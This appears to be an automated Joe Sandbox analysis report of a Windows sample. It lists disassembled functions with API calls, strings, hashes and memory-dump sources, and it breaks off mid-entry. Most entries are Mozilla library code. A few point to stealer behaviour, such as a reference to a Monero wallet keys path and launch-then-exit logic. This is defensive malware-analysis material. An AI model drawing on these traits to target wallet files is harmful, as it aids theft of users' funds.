Instruction Fuzzy Hash: 50614F71A00258EBDB24EFA4DC96FEE7775AF85304F008118F90A5F195EB746A05CF92

Function 6C654DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C654E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C654E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C654EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C654F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C654F1E

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 52175f95d4ea3090ad09e7d1fb6a04a335b1bba66f3e2ef145f8db46a4b08874
Instruction ID: fa9019ae94530c368e15ab28f76c0ca6e05641a3aa38c6ac439540feb09e902e
Opcode Fuzzy Hash: 52175f95d4ea3090ad09e7d1fb6a04a335b1bba66f3e2ef145f8db46a4b08874
Instruction Fuzzy Hash: 8C41F0716087019FC701CF29C8809ABB7E4BF8A344F608A5DF56687640DBB1E935CB85

Function 6C661530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C66159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C6615BC
moz_xmalloc.MOZGLUE(-00000001,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C6615E7
free.MOZGLUE(?,?,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C661606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C661637

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 60c595e13ce2a9c8a199b3a496b84ba9900cf50bf30422973b7d5e0842e1335b
Instruction ID: d01c86a85d46c23a7c691215a81a34074b03034866677b6b18a6f6f243d40b0c
Opcode Fuzzy Hash: 60c595e13ce2a9c8a199b3a496b84ba9900cf50bf30422973b7d5e0842e1335b
Instruction Fuzzy Hash: 9C31EAB1A001149BCB148E7DD8514AEB7A5FB823647240B2DE423DBFD4EB30D915879B

Function 6C6BAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAD9D

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE01
GetLastError.KERNEL32(?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE3D

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 0f21de2af0562fbe7cdfc5f35f1760c945e4117e18b0c4ae4a851e01653c96bd
Instruction ID: 4eb5dd445afc357e947c968c0e77c1b944aa70b059dce956206679de5e0986f5
Opcode Fuzzy Hash: 0f21de2af0562fbe7cdfc5f35f1760c945e4117e18b0c4ae4a851e01653c96bd
Instruction Fuzzy Hash: FB3164B1A002159FDB10DF7A8C44AABB7F8EF49714F15482DE94AE7700E734E815CBA9

Function 6C65B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C65B532
moz_xmalloc.MOZGLUE(?), ref: 6C65B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C65B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C65B57E
free.MOZGLUE(00000000), ref: 6C65B58F

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 4d383c59ac1466ad9845e72a84ae01ba623d94f7e40b200926ea7cdfc1fc98de
Instruction ID: 89d8c58b405f94ff87142cdd8ce363126df9faeab29231e2da6d786d2f4b5cda
Opcode Fuzzy Hash: 4d383c59ac1466ad9845e72a84ae01ba623d94f7e40b200926ea7cdfc1fc98de
Instruction Fuzzy Hash: 3D212971A002059BDB00CF69CC80BAEBBB9FF86304F784129E918DB345E736D921C7A5

Function 00936920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 0093696C
sscanf.NTDLL ref: 00936999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009369B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009369C0
ExitProcess.KERNEL32 ref: 009369DA

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 3a21276cd7f90df18236a5176aee02e197440fdc15b09b1dbb737c91b9fd0673
Instruction ID: bfd24cd9047eed487d0f02e076a199b33010f1da8c8f20c005a397bbf214f056
Opcode Fuzzy Hash: 3a21276cd7f90df18236a5176aee02e197440fdc15b09b1dbb737c91b9fd0673
Instruction Fuzzy Hash: 9F21C9B5D14209ABCF04EFE4D955AEEB7B9BF48300F04852AE506F3250EB745605CFA9

Function 6C690D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C653DEF), ref: 6C690D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C653DEF), ref: 6C690D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C653DEF), ref: 6C690DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C690D97, 6C690DBE
<jemalloc>, xrefs: 6C690D92, 6C690DB9

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 13bbc51be261d3e61bd704e20e53ec9f8c3ea23577e6d8f8bb17b6e2824cef17
Instruction ID: 9eb333f3b368d62e8b1546ca32396374ec09f74a64d74f8d664fc73b983ace28
Opcode Fuzzy Hash: 13bbc51be261d3e61bd704e20e53ec9f8c3ea23577e6d8f8bb17b6e2824cef17
Instruction Fuzzy Hash: C2F02E3138039623E72016670C0AF6A269EA7C6B35F314035F744DE9C4DA90F80486AE

Function 6C67D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

EnterCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D4F2
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D50B

Part of subcall function 6C65CFE0: EnterCriticalSection.KERNEL32(6C6DE784), ref: 6C65CFF6
Part of subcall function 6C65CFE0: LeaveCriticalSection.KERNEL32(6C6DE784), ref: 6C65D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D52E
EnterCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D690
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D751

Strings

MOZ_CRASH(), xrefs: 6C67D4BB

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 4a4597c506335fd374026c37a78a4c4713f739f71224aa12a41bea50c1db6c0a
Instruction ID: 72be7f876658cff6d62bdf5daf5ff4cfa071adc8b61d5b6b6fcdee3ae64f8576
Opcode Fuzzy Hash: 4a4597c506335fd374026c37a78a4c4713f739f71224aa12a41bea50c1db6c0a
Instruction Fuzzy Hash: E651A071A047018FD364CF29C49465AB7F1EF89704F558E2ED59AC7B84D770E840CB6A

Function 0093C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtGetStringTypeA.LIBCMT ref: 0093C8EC
___crtLCMapStringA.LIBCMT ref: 0093C90C
___crtLCMapStringA.LIBCMT ref: 0093C931

Strings

, xrefs: 0093C896

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Type
String ID:
API String ID: 2109742289-3916222277
Opcode ID: 647480fad50523f1ce1341a6b90ee92f349a196b41a3a90d3ee58b19094c219e
Instruction ID: 6c4a3200b4dd2d3d30ecfdedcc745b75ee9367243843663152d105cc8422f146
Opcode Fuzzy Hash: 647480fad50523f1ce1341a6b90ee92f349a196b41a3a90d3ee58b19094c219e
Instruction Fuzzy Hash: 264106B1100B9C5EDB218B24CC85FFBBBED9F45708F1448E8E9CAA6182D2719B44DF20

Function 6C6AB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C654290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C693EBD,6C693EBD,00000000), ref: 6C6542A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C6AB127), ref: 6C6AB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6AB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C6AB4E4

Strings

pid:, xrefs: 6C6AB4DE

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: f2833832c2e09ac9d0fa345bfb691ad62b155d79752d84222e94a571c01022f7
Instruction ID: 08c90ab0690d7f8403227b0f2834ab55f99ceeb46082f2b9e9c56eb2096e64bc
Opcode Fuzzy Hash: f2833832c2e09ac9d0fa345bfb691ad62b155d79752d84222e94a571c01022f7
Instruction Fuzzy Hash: E431E031A0120C9FDB00DFEAD880AEEB7B5FF85318F540529D81267A45D732AD46CBA9

Function 00936630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00936663

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

ShellExecuteEx.SHELL32(0000003C), ref: 00936726
ExitProcess.KERNEL32 ref: 00936755

Strings

<, xrefs: 009366D9

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 0791ef7e8745713e66842698ac2caf31723498c6f6c75136431c2581fb51a16d
Instruction ID: d317a476531e07c0681f0aaba46e35f3b5fe75c408789f46d305d322b6535935
Opcode Fuzzy Hash: 0791ef7e8745713e66842698ac2caf31723498c6f6c75136431c2581fb51a16d
Instruction Fuzzy Hash: 0E31FDB1801218AADB14EB50DC95BDE7778AF54300F404199F20A77191DF746B49CF5A

Function 009387C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00940E28,00000000,?), ref: 0093882F
RtlAllocateHeap.NTDLL(00000000), ref: 00938836
wsprintfA.USER32 ref: 00938850

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Strings

%dx%d, xrefs: 00938847

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: ffeb2c6ac86d6bd37112607f8ac9ab06a6cf139cb669c1f6fcc4657ac3a67608
Instruction ID: eaceb1936da3f50bdd40d27aa3b0415d60cb9880c853e06d497a4ee98d076ca3
Opcode Fuzzy Hash: ffeb2c6ac86d6bd37112607f8ac9ab06a6cf139cb669c1f6fcc4657ac3a67608
Instruction Fuzzy Hash: 6521EAB1A45208ABDB04DF94DD49FAEBBB8FB48711F104119F605B72D0CBB9A9018FA1

Function 6C69E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C69E577
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69E584
